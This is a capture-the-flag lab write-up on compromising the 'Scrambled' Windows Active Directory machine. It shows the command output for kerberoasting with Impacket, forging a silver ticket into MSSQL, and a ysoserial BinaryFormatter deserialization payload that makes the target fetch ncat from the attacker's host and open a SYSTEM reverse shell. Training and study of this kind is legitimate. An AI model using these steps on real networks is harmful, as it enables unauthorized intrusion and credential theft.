Scrambled is a Medium Windows Active Directory machine. Enumerating the website hosted on the remote machine a potential attacker is able to deduce the credentials for the user ksimpson. On the website, it is also stated that NTLM authentication is disabled meaning that Kerberos authentication is to be used. Accessing the Public share with the credentials of ksimpson, a PDF file states that an attacker retrieved the credentials of an SQL database. This is a hint that there is an SQL service running on the remote machine. Enumerating the normal user accounts, it is found that the account SqlSvc has a Service Principal Name (SPN) associated with it. An attacker can use this information to perform an attack that is knows as kerberoasting and get the hash of SqlSvc. After cracking the hash and acquiring the credentials for the SqlSvc account an attacker can perform a silver ticket attack to forge a ticket and impersonate the user Administrator on the remote MSSQL service. Enumeration of the database reveals the credentials for user MiscSvc, which can be used to enumerate shares finding IT share readable. Looking at the files found from the share, reveals a .NET application, which is listening on port 4411. Reverse engineering the application reveals that it is using the insecure Binary Formatter class to transmit data, allowing the attacker to upload their own payload and get code execution as nt authority\system.
PORT STATE SERVICE REASON VERSION 53/tcp open domain syn-ack ttl 127 Simple DNS Plus 80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0 88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-01 14:18:04Z) 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? syn-ack ttl 127 464/tcp open kpasswd5? syn-ack ttl 127 593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name) 1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000 3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name) 3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name) 4411/tcp open found? syn-ack ttl 127 5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing 49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49673/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 49674/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49700/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49706/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 60880/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Port 4411
Seems to be a custom app maybe?
1 2 3 4 5 6
$ telnet 10.10.11.168 4411 Trying 10.10.11.168... Connected to 10.10.11.168. Escape character is '^]'. SCRAMBLECORP_ORDERS_V1.0.3;
We’ll can come back later.
HTTP
User found from website ksimpson. Looking at the password reset page, in short they are changing the password to the username.
SMB (Authenticating Through Kerberos)
Using kerberos to check if user is valid with the FQDN.
Looking at them with smbclient, Public is the only interesting one we can read.
1 2 3 4 5 6 7 8 9 10
impacket-smbclient 'scrm.local/ksimpson:ksimpson@dc1.scrm.local' -k -no-pass Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping... Type help for list of commands # use Public # ls drw-rw-rw- 0 Thu Nov 4 17:23:19 2021 . drw-rw-rw- 0 Thu Nov 4 17:23:19 2021 .. -rw-rw-rw- 630106 Fri Nov 5 12:45:07 2021 Network Security Changes.pdf
Upon grabbing and reading we see that there was a previous attack where an attacker targeted SQL. We will try that soon enough!
Kerberoasting cuz We care!!
Looking at what SPNs are running under our user we find MSSQL associated with our user.
1 2 3 4 5 6 7 8 9
$ GetUserSPNs.py -dc-host dc1.scrm.local -k 'scrm.local/ksimpson:ksimpson' Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping... [-] CCache file is not found. Skipping... ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation ---------------------------- ------ -------- -------------------------- -------------------------- ---------- MSSQLSvc/dc1.scrm.local:1433 sqlsvc 2021-11-03 11:32:02.351452 2025-03-30 19:26:14.609217 MSSQLSvc/dc1.scrm.local sqlsvc 2021-11-03 11:32:02.351452 2025-03-30 19:26:14.609217
We can request these and the try to crack. Which this gives a cleartext password for the svcsql account.
Silver Ticket Attacks
MSSQL is running, so we can forge a silver ticket and connect as the Administrator of the instance.
[+] Impacket Library Installation Path: /usr/local/lib/python3.11/dist-packages/impacket-0.13.0.dev0+20241024.90011.835e1755-py3.11.egg/impacket [*] Encryption required, switching to TLS [+] Using Kerberos Cache: Administrator.ccache [+] SPN MSSQLSVC/:1433@SCRM.LOCAL not found in cache [+] AnySPN is True, looking for another suitable SPN [+] Returning cached credential for MSSQL/@SCRM.LOCAL [+] Using TGS from cache [+] Changing sname from MSSQL/@SCRM.LOCAL to MSSQLSVC/:1433@SCRM.LOCAL and hoping for the best [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(DC1): Line 1: Changed database context to 'master'. [*] INFO(DC1): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (150 7208) [!] Press help for extra shell commands SQL (SCRM\administrator dbo@master)>
Winner Winner SQL Dinner!!!
MSSQL (Through the Looking Glass)
We can look through the database real quick to see if anything interesting is lingering about.
SQL (SCRM\administrator dbo@master)> select name from sys.databases; name ---------- master
tempdb
model
msdb
ScrambleHR
SQL (SCRM\administrator dbo@master)> use ScrambleHR; ENVCHANGE(DATABASE): Old Value: master, New Value: ScrambleHR INFO(DC1): Line 1: Changed database context to 'ScrambleHR'. SQL (SCRM\administrator dbo@ScrambleHR)> select name from sys.tables; name ---------- Employees
$ impacket-smbclient 'scrm.local/MiscSvc:<SNIP>@dc1.scrm.local' -k -no-pass Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping... Type help for list of commands # use IT # ls drw-rw-rw- 0 Wed Nov 3 14:32:55 2021 . drw-rw-rw- 0 Wed Nov 3 14:32:55 2021 .. drw-rw-rw- 0 Wed Nov 3 16:06:32 2021 Apps drw-rw-rw- 0 Wed Nov 3 14:32:44 2021 Logs drw-rw-rw- 0 Wed Nov 3 14:32:55 2021 Reports # cd Apps # ls drw-rw-rw- 0 Wed Nov 3 16:06:32 2021 . drw-rw-rw- 0 Wed Nov 3 16:06:32 2021 .. drw-rw-rw- 0 Fri Nov 5 15:57:08 2021 Sales Order Client # cd Sales Order Client # ls drw-rw-rw- 0 Fri Nov 5 15:57:08 2021 . drw-rw-rw- 0 Fri Nov 5 15:57:08 2021 .. -rw-rw-rw- 86528 Fri Nov 5 15:57:08 2021 ScrambleClient.exe -rw-rw-rw- 19456 Fri Nov 5 15:57:08 2021 ScrambleLib.dll # mget *
Dnspying
After getting the files on our windows VM we can look at them in dnspy.
From this we can load both the exe and dll. The dll will hold libraries which we can look at called ScrambleLib. Inside them we find a library showing us a certain username we can use to bypass authentication.
Upon connecting with the domain we get the dashboard. Other tabs show a way to create a new order. We can enable debug logging from Tools so we get a output file we can read. Lets try to create an order and get output.
Making sense of the output
We see that we are send data to the server LIST_ORDERS;. Also base64 and deserialization is being used, as well as Binary Formatting. We see near the bottom, UPLOAD_ORDER; and then base64. If we rememeber from the very beginning there was port 4411 running that gave us feedback.
Back to Suite 4411 with Deserialization
We can use ysoserial to encode our payloads. First we can setup a python server hosting ncat.
Linux VM: $ telnet 10.10.11.168 4411 Trying 10.10.11.168... Connected to 10.10.11.168. Escape character is '^]'. SCRAMBLECORP_ORDERS_V1.0.3; UPLOAD_ORDER;AAEAAAD/////<SNIP> ERROR_GENERAL;Error deserializing sales order: Exception has been thrown by the target of an invocation. SESSION_TIMED_OUT;
So we got it to grab ncat. Now we can do the same thing and execute ncat now and once we do we get a shell back.
1 2 3 4 5 6 7 8 9
$ rlwrap nc -lvnp 9001 listening on [any] 9001 ... connect to [10.10.14.7] from (UNKNOWN) [10.10.11.168] 50224 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami whoami nt authority\system
